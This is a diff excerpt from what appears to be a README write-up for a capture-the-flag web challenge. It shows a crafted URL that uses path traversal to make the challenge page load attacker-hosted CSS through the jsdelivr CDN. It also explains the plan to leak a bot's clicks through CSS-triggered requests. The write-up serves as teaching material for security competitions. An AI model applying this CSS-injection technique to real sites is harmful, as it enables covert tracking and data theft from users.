GramThanos/bi0sCTF-2022-emo-locker/README.md

 ```
 https://cdn.jsdelivr.net/npm/darkmode-css@1.0.1/xxxxxxx-mode.css
 ```
-By visiting `http://web.chall.bi0s.in:10101/#../../gh/GramThanos/github_repo_here@github_commit_here/malicious.css?` the CSS that the page will load will be:
+By visiting `http://web.chall.bi0s.in:10101/#../../gh/GramThanos/github_repo_here@github_commit_here/malicious.css?` the CSS that the page will load will be (notice the path traversal):
 ```
 https://cdn.jsdelivr.net/gh/GramThanos/github_repo_here@github_commit_here/malicious.css?-mode.css
 ```

+Note: The jsdelivr CDN apart from access to NPM modules also can give access to GitHub projects.
+Thus we can deliver our code through GitHub.
+Note that since jsdelivr is caching our files, it is best to point to specific commits when we deliver payloads.

 Since the code is in CSS, we will have to detect the user actions (click) using CSS.
 This is done by creating a request on each action and monitoring the requests.
 Normaly to do that you add background image requests on actions such as "hover", "focus", "active", but here since the client is a bot, such mouse events where not working.